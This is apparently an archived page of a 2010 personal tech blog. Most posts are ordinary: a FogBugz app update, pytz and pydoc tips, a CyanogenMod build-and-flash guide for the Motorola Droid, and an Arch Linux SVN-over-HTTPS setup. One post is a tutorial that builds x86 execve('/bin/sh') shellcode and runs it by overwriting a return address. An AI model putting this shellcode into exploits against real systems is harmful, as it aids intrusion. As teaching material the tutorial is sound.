BogFugz Update

July 14th, 2010 mpsb No comments

New BogFugz update fixes an error with hosted accounts. This requires a settings change for people who already have it working.

For instance, the fogbugz instance at my office is hosted by us. For that one I must now use the URL http://fogbugz.mycompany.com/fogbuz whereas before this update I had to use fogbuz.mycompany.com only. The program was defaulting to http:// and automatically including the “/fogbugz”.

Now for a hosted account, like my test one, you must use https://optedoblivion.fogbugz.com

Note: Must not contain a / at the end!!!

I will be able to focus more attention on this application soon. Sorry for the delays everyone!

If you have any questions or want updates please follow @BogFugz on twitter.

Thank you.

Categories: Uncategorized Tags:

New Theme

March 26th, 2010 mpsb No comments

Time for a new theme. Lets see how long this one goes for.

Categories: Uncategorized Tags:

The Dark Arts – Generating Shellcode

March 25th, 2010 mpsb No comments

Ever wonder about the cryptic looking hex shellcode? Ever wonder how the hell do people produce those things? Does anyone still use them!?

Necessities

  • Linux (Any Flavor)
  • GCC
  • GDB
  • VIM (or NANO)

First we will start by creating a new file named shellcode.c containing this:

#include
int main(){
execve(“/bin/sh”, NULL, NULL);
return 0;
}

Now, what we have done here is demonstrated the action of the execve() system call “0xb”. This system call is also represented by the C function execve().

int execve(const char *filename, char *const argv[], char *const envp[])

Next we will need to replicate this code, but in assembly.

Make a new file called shellcode.s

.section .text
.global main

main:

xorl %eax,%eax # NULLIFY
xorl %ecx,%ecx # NULLIFY
xorl %edx,%edx # NULLIFY

pushl %edx # push NULL to terminator
pushl $0x68732f2f # push //sh
pushl $0x6e69622f # push /bin

mov %esp, %ebx # Move stack pointer address to ebx
pushl %edx # Push NULL terminator
movl %esp,%ecx # Move stack pointer address to ecx

movl $0xb, %eax # Move execve instruction into action register
int $0×80 # Interrupt kernel for job

xorl %ebx,%ebx # NULLIFY
movl %ebx,%eax # Set up for
incl %eax # Clean exit
int $0×80 # Interrupt kernel for exit

Basically, this can be broken into two five parts:

  • NULL out Registers
  • Push /bin//sh onto stack
  • Set up execve arguments
  • Execute execve(“/bin/sh”, NULL, NULL)
  • Make a clean exit

Now that we have some working assembly code. Lets try it out. :)

$ gcc -o shellcode shellcode.s
$ ./shellcode
$ exit
exit
$

You should have another shell session execute, and you can type “exit” and go back to the original shell session.

If that is the case, you are good, and you can skip this next part.

If not, you may need to alter the Assembly to work for you machine. Try adding

pushl %ebx

Before this line:

movl %esp,%ecx # Move stack pointer address to ecx

If it works for you at this point, then open the binary in gdb.

$ gdb shellcode
(gdb) disassemble main
Dump of assembler code for function main:
0×08048374 : xor %eax,%eax
0×08048376 : xor %ecx,%ecx
0×08048378 : xor %edx,%edx
0x0804837a : push %edx
0x0804837b : push $0x68732f2f
0×08048380 : push $0x6e69622f
0×08048385 : mov %esp,%ebx
0×08048387 : push %edx
0×08048388 : mov %esp,%ecx
0x0804838a : mov $0xb,%eax
0x0804838f : int $0×80
0×08048391 : xor %ebx,%ebx
0×08048393 : mov %ebx,%eax
0×08048395 : inc %eax
0×08048396 : int $0×80
0×08048398 : nop
0×08048399 : nop
0x0804839a : nop
0x0804839b : nop
0x0804839c : nop
0x0804839d : nop
0x0804839e : nop
0x0804839f : nop
(gdb) x
0×8048398 : 0×90
(gdb) x/36 main
0×8048374

: 0×31 0xc0 0×31 0xc9 0×31 0xd2 0×52 0×68
0x804837c : 0x2f 0x2f 0×73 0×68 0×68 0x2f 0×62 0×69
0×8048384 : 0x6e 0×89 0xe3 0×52 0×89 0xe1 0xb8 0x0b
0x804838c : 0×00 0×00 0×00 0xcd 0×80 0×31 0xdb 0×89
0×8048394 : 0xd8 0×40 0xcd 0×80

Copy and paste this into vim(nano), and make everything look like this


char shellcode[] =
"\x31\xc0\x31\xc9\x31\xd2\x52\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x52\x89\xe1\xb8\x0b"
"\x00\x00\x00\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80";

Save the file as payload.h

Now, create a new file called runsh.c

#include
#include "payload.h"
int main(void){
// Create pointer to address in memory
int * ret;
// Set value = pointer address + two
ret = (int *)&ret + 2;
// Set value = shellcode
(*ret) = (int)shellcode;
}

$ gcc -o runsh runsh.c
$ ./runsh
$ exit
exit
$

Success!

Categories: C, The Dark Arts Tags:

Quick Tips – Pydoc FTW

March 24th, 2010 mpsb No comments

Ever have the urge to know what the heck your python modules really do?

Why not just read what they have to say?

Well, if you’re running a Linux flavor, do this.


which pydoc

you should see something like /usr/bin/pydoc show up.

If that is the case, then do this.


pydoc -p 8000

Then browse to localhost:8000

Categories: Python, Quick Tips Tags:

Quick Tips – Date and Time localization

March 24th, 2010 mpsb No comments

Ever struggle with the best way to localize dates and times?

If you have, then pytz is your friend.

You have to easy_install this package because it’s not included in the python base packages.

easy_install pytz

Using it is quite simple. Here is a quick example…lets say my current time is in US/Eastern. I create a datetime object using the datetime package, and calling the now() function. This gives me a datetime object that I have created is a naive datetime object.

>>> import pytz
>>> import datetime
>>> now = datetime.datetime.now()

I must now localize it to my current timezone.

>>> eastern = pytz.timezone(“US/Eastern”)
>>> now = eastern.localize(now)

Now, if I need to display my time in another timezone, I can create another timezone object, and use it to localize my object in the same manner.

>>> utc = pytz.utc
>>> now = utc.localize(now)

That about sums up how to use the package. Comes in really handy, and I’ve used it quite a few times in the past year.

Categories: Python, Quick Tips Tags:

CyanogenMod 5 for Droid

March 1st, 2010 mpsb No comments

Koush has done a good job at porting this to droid. http://bit.ly/cnrj8N
Installing it right now, and seeing how the stable version is. I tried beta 6, it seemed fine, except I didn’t like the first boot having 1200MHz off the start. Now this is using the stock kernel, so I’m happier about trying it. Booting now, There are some Audio Post Processor errors in the logcat, one of which can be easily fixed. libGL still throwing render exceptions. Live wallpaper not interactive with original home launcher. (The one with the app drawer). The keyboard back light isn’t working, which is a big deal. I am not sure I would have called this stable and brought it out of beta. It also seems a bit sluggish with the stock kernel. I think a 600MHz kernel might help some, but probably not enough. All in all it’s a decent ROM to run, and has some good 2.1 features. Needs some fixes before I would consider it fully stable/production material, but considering all the work put into it, I still think koush has done a great job. You can follow him on twitter @koush.

Categories: Android, Uncategorized Tags:

Zero Gravity

March 1st, 2010 mpsb 5 comments

Just finished submitting Zero Gravity hax to google for code review. I hope they accept it so everyone, even non-rooters, will have this ability.

Categories: Uncategorized Tags:

Awesome new boot logo!

February 24th, 2010 mpsb 1 comment

Check this out. This guy has done some awesome work for replacing your boot logo from the motorola M to a skull and crossbones!

See here

Categories: Uncategorized Tags:

AOSP/CyanogenMod5 and the Droid

February 24th, 2010 mpsb 2 comments

STOP: YOU NEED ROOT!

If you like this please Donate for a dev droid. (http://bit.ly/OptedDonate)

Most of the development scene going on for Android revolves around the HTC world. I am a big HTC fan, and love their phones. I am with Verizon though, and the last HTC I had was an HTC Touch/Vogue, which I successfully ran Android on. It wasn’t too pretty though. Now that I have a Droid, and there seems to be a small community of Droid developers, a lot of them try to hide their trade secrets. My goal is to post everything I can figure out about this awesome device.

Wanna work with the AOSP to compile your own vendor setup? Choose which Packages you want to install? Lets do it! I am going to go over the easiest way possible.

In order to work with this you will need to familiarize yourself with Git; which can be done with Google so we won’t cover that here. Really you can get away with reading the link in step two, but it is recommended to RTFM.

Most of these tools are obtainable from searching google!

Full List of Needs:

  • SPRecovery 0.99b
  • Sun Java SDK 1.5
  • Git
  • Repo Tool
  • flash_image tool
  • Brain

Disclaimer: IF YOU BRICK YOUR DEVICE ONLY YOU ARE RESPONSIBLE!!!

Okay, Step 1 – navigate to http://www.github.com/cyanogen (this guy is awesome, so be sure to stop by and thank him on twitter @cyanogen)

Step 2 – download the repo tool from google. Go here and read this to learn how to use it and Git.

Google Repo and Git

Step 3 – Ok, now that we should have some needed tools to get the repo lets get some code!


mkdir -p $HOME/Cyanogen && cd $HOME/Cyanogen
repo init -u git://github.com/cyanogen/android.git -b eclair
repo sync

Now take a trip to your local gate for a red bull.

*some jeopardy music as you drink your red bull*

When it’s done, you should have a huge directory of code (~3.5GB). In short, what the repo tool did was a massive git from many locations. These locations can be found in the .repo/manifest.xml.

Step 4 – Now lets try to build something!


cd vendor/motorola/sholes-open

Step 5- Plug in your phone, and I am assuming you have ADB (Android Debug Bridge) and the appropriate udev rules!!

Step 6 – Run the proprietary extraction script provided in the sholes-open vendor setup.

./extract-files.sh

Step 7 – Now for the fun part
Note: depending on how many cores you have, replace the -j8 with -j.

cd $HOME/Cyanogen
source build/envsetup.sh
lunch cyanogen_sholes-eng
make -j8

Step 8 – Wait…..Now depending on how long it takes for your local repo to compile…might wanna take a nap, or go do something.

Note: This article doesn’t cover debugging the build!

Step 9 – Once your repo has successfully compiled.


cd $HOME/Cyanogen/out/target/product/sholes-open/

Look around you should see quite a few files. The only ones we should be interested in for the moment are:

  • boot.img
  • system

Now do this:
Note: this is for SPRecovery. There is a better recovery out from clockworkmod. You can package the build as an update.zip for that one.

cd system
tar -cvvf system.tar `ls`
cd ..
mkdir -p ./packaged && cd packaged
mv ../boot.img ./
mv ../system/system.tar ./
adb shell mkdir /sdcard/cyanogen
adb push boot.img /sdcard/cyanogen/
adb push system.tar /sdcard/cyanogen/
adb reboot recovery

Now we need to install it. Everything from here forward will be done in the android terminal via “adb shell”
Now also would be a good time to nandroid!

In your terminal type “adb shell”

Now in your recovery shell

Make sure your sdcard is mounted!

mount /sdcard
cd /sdcard/cyanogen
format SYSTEM:
format DATA:
format CACHE:
flash_image boot boot.img
mount /system
cd /system
tar xvf /sdcard/cyanogen/system.tar
exit

now type “adb reboot”
then “adb lolcat” to watch it boot.

Good luck!

If you like this please Donate for a dev droid. (http://bit.ly/OptedDonate)

Categories: Android, Git Tags:

Arch Linux SSL Subversion HOWTO

February 12th, 2010 mpsb 68 comments

In order to set up Arch Linux with subversion over HTTPS; you will first need to make sure you have the proper dependencies installed.

  1. Subversion
  2. Apache

This can be accomplished via pacman like so:

pacman -S apache subversion

Check you /etc/httpd/conf/http.conf for these entries

LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
LoadModule dav_svn_module modules/mod_dav_svn.so
LoadModule authz_svn_module modules/mod_authz_svn.so

Now we need to set up an SSL cert. In order to do this we need to

cd /etc/httpd/conf
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

Enter in the information that is asked by the prompts.

Now edit the following file: /etc/httpd/conf/extra/httpd-ssl.conf to add


DAV svn
SVNParentPath /home/svn/repositories
AuthzSVNAccessFile /home/svn/.svn-policy-file
AuthName “SVN Repositories”
AuthType Basic
AuthUserFile /home/svn/.svn-auth-file
Satisfy Any
Require valid-user

Now edit /etc/httpd/conf/httpd.conf to uncomment or add this line

Include conf/extra/httpd-ssl.conf

Almost done!
Now just edit /home/svn/.svn-policy-file and add

[/]
* = r
[REPO_NAME:/]
USER_NAME = rw

now run

htpasswd -cs /home/svn/.svn-auth-file USER_NAME

replace USER_NAME with your desired username, then set a password.

restart apache

/etc/rc.d/httpd restart

Make sure that when you create a repo in the repositories folder that you run

chown -R http.http /home/svn/repositories/REPO_NAME

to give it proper permissions.

Categories: Arch Linux, Subversion Tags: